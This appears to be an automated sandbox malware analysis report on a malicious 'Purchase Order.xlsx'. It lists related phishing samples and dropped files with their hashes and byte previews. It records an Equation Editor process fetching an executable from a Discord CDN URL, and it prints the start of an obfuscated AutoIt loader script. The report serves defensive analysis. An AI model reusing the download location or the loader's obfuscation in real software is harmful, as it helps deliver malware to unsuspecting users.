                                                                                                                                                                    7dcce5b76c8b17472d024758970a406bSecuriteInfo.com.Heur.30497.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (2553).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (1057).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (4335).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (1522).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (4374).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (166).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    PAYMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (547).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    The Mental Health Center.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    SC-TR1167700000.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (348).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    RefTreeAnalyserXL.xlamGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (426).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (250).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (1447).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (850).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exePO#21010028 - SYINDAC QT-00820_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                      MC8ZX01sSo.exeGet hashmaliciousBrowse
                                                                                                                                                                        F6AAdCq3uj.exeGet hashmaliciousBrowse
                                                                                                                                                                          tZy7EYc9Da.exeGet hashmaliciousBrowse
                                                                                                                                                                            YMQ6XNETnU.exeGet hashmaliciousBrowse
                                                                                                                                                                              AWB 9899691012 TRACKING INFO_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                BANK FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                  order0004345.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    Bill of Lading BL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      Clntnjk.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                        HTG-9066543.exeGet hashmaliciousBrowse
                                                                                                                                                                                          vbc.exeGet hashmaliciousBrowse
                                                                                                                                                                                            HTMY-209871640.exeGet hashmaliciousBrowse
                                                                                                                                                                                              YOeg64zDX4.exeGet hashmaliciousBrowse
                                                                                                                                                                                                qZtylTGU0c.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  w2kN50kQQ4.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    EOJ55l6pzU.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      payload.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                        payload.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                          ResistanceWallet_2.2.8.exeGet hashmaliciousBrowse

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe
                                                                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):772519
                                                                                                                                                                                                            Entropy (8bit):7.418330987363757
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:j2HExSVOfCd3zYo/t06XRYahwLBV/N/aXFrMGUFoweuoDvGE84nl1GWK+WrF:jl8Eo/q4RJhYflsyAlu2fGWvw
                                                                                                                                                                                                            MD5:40BFB08CE97F3709F4DE7C6BA8B3401E
                                                                                                                                                                                                            SHA1:203515852D43907510315684682A1F1453DB2E80
                                                                                                                                                                                                            SHA-256:2D62D3A5D3989B0DCC3484BF4D5FC73FE78546EFAD83D8CF0FD12B19E2EA65F7
                                                                                                                                                                                                            SHA-512:D09C744BA65587EEC76D4204305B15B93B64A37EDDDA52310F2980C5CE6481CDC1AF691F2762371123A4D49A5EE42E54477BFBE40F275EBCA29794EBFCE99EC5
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            IE Cache URL:https://cdn.discordapp.com/attachments/801801194535518211/803618842571702292/scancopy87867678.exe
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d...|......a4............@.......................................@.................................8...........<............................................................................................................text...<b.......d.................. ..`.rdata..t............h..............@..@.data...X............|..............@....ndata.......P...........................rsrc...<...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\205620C7.emf
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):653280
                                                                                                                                                                                                            Entropy (8bit):2.898608770817033
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:S34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:84UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                                                                            MD5:6AED6213D833268E6FC055A7BFAD6840
                                                                                                                                                                                                            SHA1:3F43F767D1F2118AABB228FC4E0C10F9A11442ED
                                                                                                                                                                                                            SHA-256:AEE4E2FB9AA7E8769B7FF18BAEC197EC13B3FCACC08D91F8CEEBD9538ADD5608
                                                                                                                                                                                                            SHA-512:303B3F7C6782C8A2674409B5AF36A639657269394213E25950E245262A0A811765CEEDFF6FAEF0984785E391E88AA59F0C49115913201893EC636944C3F44B7E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i........................................................................N.T............p........N.T........ ....yQP........ ............zQP............O...............................X...%...7...................{ .@................C.a.l.i.b.r.................X.......4....2JP........p...p....{HP............dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\28DDF41C.jpeg
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                            File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):48770
                                                                                                                                                                                                            Entropy (8bit):7.801842363879827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                                                            MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                                                            SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                                                            SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                                                            SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59448D6D.jpeg
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                            File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):48770
                                                                                                                                                                                                            Entropy (8bit):7.801842363879827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                                                            MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                                                            SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                                                            SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                                                            SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe
                                                                                                                                                                                                            Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):893608
                                                                                                                                                                                                            Entropy (8bit):6.620131693023677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                                                                                                                                                            MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                                                                                                            SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                                                                                                                                                            SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                                                                                                                                                            SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 5%, Browse
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: PO#21010028 - SYINDAC QT-00820_pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: MC8ZX01sSo.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: F6AAdCq3uj.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: tZy7EYc9Da.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: YMQ6XNETnU.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: AWB 9899691012 TRACKING INFO_pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: BANK FORM.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: order0004345.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: Bill of Lading BL.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: Clntnjk.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: HTG-9066543.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: vbc.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: HTMY-209871640.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: YOeg64zDX4.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: qZtylTGU0c.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: w2kN50kQQ4.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: EOJ55l6pzU.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: payload.vbs, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: payload.vbs, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: ResistanceWallet_2.2.8.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):893608
                                                                                                                                                                                                            Entropy (8bit):6.570843086702839
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:apVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M0:aT3E53Myyzl0hMf1tr7Caw8M0
                                                                                                                                                                                                            MD5:535DD1329AEF11BF4654B3270F026D5B
                                                                                                                                                                                                            SHA1:9C84DE0BDE8333F852120AB40710545B3F799300
                                                                                                                                                                                                            SHA-256:B31445FC4B8803D1B7122A6563002CFE3E925FFD1FDC9B84FBA6FC78F6A8B955
                                                                                                                                                                                                            SHA-512:A552E20A09A796A6E3E18DECE308880069C958CF9136BB4FC3EE726D6BC9B2F8EDDBCFF06FF9F9DED4DD268F5D0F39D516AD42ECCE6455A4BF5CF4F3CB4C4ECC
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z..........................................@...........................................@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Nla\invbat.p
                                                                                                                                                                                                            Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):254655
                                                                                                                                                                                                            Entropy (8bit):4.07874315156338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Zc6X46b+ON++BzUFDq1OKOsFTt3ySKqelggtc79jB20s4Oh9lZSODO0bOdVklDOR:W69L
                                                                                                                                                                                                            MD5:697C6E6695EB5ECBC447A1CECF7B6B37
                                                                                                                                                                                                            SHA1:B26711D04AE0A3DF34B5F0AC9C3EE30282072780
                                                                                                                                                                                                            SHA-256:618B52AEC059E70C667CD57454505CE2566698B15E9F005F994E95240F5D7253
                                                                                                                                                                                                            SHA-512:EBC227B13DA4852EB04B4617262B37E76667AB15E508692170AC6B76503FE12473152032E9A3C245F0F676B181AD2FDA53F212C479EEE646814527651034F979
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: #NoTrayIcon..Global $Z30cwh, $P314z7, $Y32yadpjrxs, $A33jm178, $K34kd, $U35a02bc..For $Z30cwh = 0 To Random(5, 8, 1).. $Y32yadpjrxs = 0.. For $A33jm178 = 2 To 100.. $P314z7 = True.. $K34kd = 2.. While $K34kd*$K34kd<=$Z30cwh.. If Mod($Z30cwh, $K34kd) == 0 Then.. $Y32yadpjrxs = False.. ExitLoop.. EndIf.. $K34kd += 1.. WEnd.. If $P314z7 Then $Y32yadpjrxs = $A33jm178.. Next..Next..Dim $F3231ld0wrrz = GUICreate(Chr((-945+1024))&Chr((-907+1024))&Chr((-908+1024))&Chr((-926+1024))&Chr((-907+1024))&Chr((-925+1024))&Chr((-917+1024))&Chr((-992+1024))&Chr((-951+1024))&Chr((-914+1024))&Chr((-925+1024)), 102, 240, -99999, -99999, 0, 128)....GUISetState(@SW_SHOW)..Global $B3232n3viy = Execute(Chr((-955+1024))&Chr((-904+1024))&Chr((-923+1024))&Chr((-925+1024))&Chr((-907+1024))&Chr((-908+1024))&Chr((-923+1024)))..Global $X323343z = $B3232n3viy(Chr((-956+1024))&Chr((-916+1024))&Chr((-916+1024))&Chr((-957+1024))&Chr((-927+1024))&Chr((-916+1024))&Chr((-916+1024)))..Global $U3235t2bw3trh =
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Nla\tigowmbk.tt
                                                                                                                                                                                                            Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164864
                                                                                                                                                                                                            Entropy (8bit):7.998841285565125
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:3072:HsEQeDs6pDONXBUqAlgiKP3N5bYfE3hZIyxUz20jtgM0zNe4eqvbgr1WEP:M3Os6MNXBUj+3PKwhvxUz24tgM0zNe44
                                                                                                                                                                                                            MD5:BDC408495C97B063E2E473444C207379
                                                                                                                                                                                                            SHA1:A2B11A79E055F4BA3256325BADB24AC7C0FDD37B
                                                                                                                                                                                                            SHA-256:611813DC76A09226A27F9062675BC555E96001E744A269F64A248F0B23237126
                                                                                                                                                                                                            SHA-512:A920F685A596EDFBECAAA4C43049BC5A9F1CA35D0E20CB1E588E2377B7662505775ECF0963241D5DEF27C6F145B61363FA6A15CEE026357C0A11205EBBA8644F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: >). m`.a.....+xm.9.A!....m...A..%.p..z...0Y..lr...s#.....'.jQ...TA.Ew......).Y..:...j...w......s.....I.........s..:..az....r...R\..|....BS.C.iZ;...VI........ .nZ...W.....0...N..N..7.".....#..........MxQ....`..{."j.f..j...x.K...!.fX.4....d....bkr;i.7L+.-.......>#..7..T..X...]...g....._T..9.u..t....5!..BA..DQ]V.?..{.6..hl..%..U.B.~s....^.B.....y.....L...@....l...{.....&....U$.t.M....0....j.=..)....w.r6Nua.].YI.......\R...)....{k.f...7.[.I..L......I.>;.....XV:l..n..S\E....n.W.#..~.............(~.F...x..,......Y..f.&.o.#..?.'E[.x....&...!>..G....q.$..A..G5W....p.?@."~...I].....i.o...Xw..T..-..=sU..:G.QP...B<..B.a.;..pF[..KH~O.[.f.....y...9.=W......Q\.QG..TN.W.D.#.....N+.....1..;e.8.j....,.m...[FP.1. .M1.vHL....a..K.....P...5+..o.3..n[..*...:.....Y..Ys^..@...Z.WbM.Z..ktr...........N...{z>...mr'..r...|...... .Cv...7[..V....@F7.Z.5.....r3@.a..j=......q...f......Bf..q.x...Bo..a.......}E.qu.@n}M@..........Z`...B.-..."Z..n.Zx...q...U.
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsjB7EC.tmp
                                                                                                                                                                                                            Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1315586
                                                                                                                                                                                                            Entropy (8bit):6.934695136999916
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:IT3E53Myyzl0hMf1tr7Caw8M07Yq2Kjf0zziP:G3EZpBh211Waw30l2o0v4
                                                                                                                                                                                                            MD5:C3789566A8D3E18FBF23594112880485
                                                                                                                                                                                                            SHA1:C2D38B852D20F77214AA5E198902B49F9119ED87
                                                                                                                                                                                                            SHA-256:1B6362748EB06A0696CF3F2EB037EF79AB594B04A93C379036C0693BB16F1D43
                                                                                                                                                                                                            SHA-512:7B44D15495C0896625B7D1DF2DA43CC0EC4EE1EFD6C2AD49CD1F865B72BAE55369ED18B4FC53C012236E4CF26509ACCD9ECD3A88BCEDA220F47392B158C5A3E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ........,...................................................................................................................................................................................................................................................................................J...............-...g...............................................................j...............................................................................................................................N.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0ZYIFCHI.txt
                                                                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):115
                                                                                                                                                                                                            Entropy (8bit):4.411267366228876
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:GmM/OYRdUnGXTzzTNOBbeSNnc4TvdLNQZdQSD:XM/vd8GXTbNCbeYTvFNg
                                                                                                                                                                                                            MD5:221C42E160D5FD00C5E29611C678E309
                                                                                                                                                                                                            SHA1:B52908A03F35FBA94916E2FABCB66512F6A9B088
                                                                                                                                                                                                            SHA-256:A194580030987D41E42461981702DEE5BB24A4504383BF4143CE91140E1485F8
                                                                                                                                                                                                            SHA-512:27699F3701592CDC2B0AD9341AC0823D4F9BF8F96918224E687E4F43BEAA85A15D6AF9086103B26DE7784519FE3653FEA319B51AC30AF9AD1D125B7775FC568F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:discordapp.com/
                                                                                                                                                                                                            Preview: __cfduid.d12a342e240ea01d4c26886895ec58aba1611728216.discordapp.com/.9728.4219943936.30870534.218830503.30864576.*.
                                                                                                                                                                                                            C:\Users\user\Desktop\~$Purchase Order.xlsx
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):330
                                                                                                                                                                                                            Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                                                            MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                                                            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                                                            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                                                            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                            C:\Users\Public\vbc.exe
                                                                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):772519
                                                                                                                                                                                                            Entropy (8bit):7.418330987363757
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:j2HExSVOfCd3zYo/t06XRYahwLBV/N/aXFrMGUFoweuoDvGE84nl1GWK+WrF:jl8Eo/q4RJhYflsyAlu2fGWvw
                                                                                                                                                                                                            MD5:40BFB08CE97F3709F4DE7C6BA8B3401E
                                                                                                                                                                                                            SHA1:203515852D43907510315684682A1F1453DB2E80
                                                                                                                                                                                                            SHA-256:2D62D3A5D3989B0DCC3484BF4D5FC73FE78546EFAD83D8CF0FD12B19E2EA65F7
                                                                                                                                                                                                            SHA-512:D09C744BA65587EEC76D4204305B15B93B64A37EDDDA52310F2980C5CE6481CDC1AF691F2762371123A4D49A5EE42E54477BFBE40F275EBCA29794EBFCE99EC5
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d...|......a4............@.......................................@.................................8...........<............................................................................................................text...<b.......d.................. ..`.rdata..t............h..............@..@.data...X............|..............@....ndata.......P...........................rsrc...<...........................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:CDFV2 Encrypted
                                                                                                                                                                                                            Entropy (8bit):7.996710044495843
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                                                            File name:Purchase Order.xlsx
                                                                                                                                                                                                            File size:2507264
                                                                                                                                                                                                            MD5:568ad30c526d3950e00385f41e08cdf2
                                                                                                                                                                                                            SHA1:a2599b55c9c9a6b39c019bfeda57b38654c72f48
                                                                                                                                                                                                            SHA256:ae24343193734ee532e142a8e64a7f27d5faf33667a7818743fd91baca01f99b
                                                                                                                                                                                                            SHA512:ff9eeb58f1b55b3d9f999d06ae4984a1db8378204494aa5887ac92ff7a1b84914dabd4df87909e836b72eb47f1a25ce46552e1ce83bd3cfdbad49bf5199abd4c
                                                                                                                                                                                                            SSDEEP:49152:K1IvmWqj262UDzyfZggrPIdVegdBpmsLwQvN9eiVg7tmDdMEFhsz:K1Lpjh2UPyfoVegjtne46gb34
                                                                                                                                                                                                            File Content Preview:........................>...................'...................................................................................|.......~...............z.......|.......~...............z.......|.......~...............z.......|..............................

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                                                            Static OLE Info

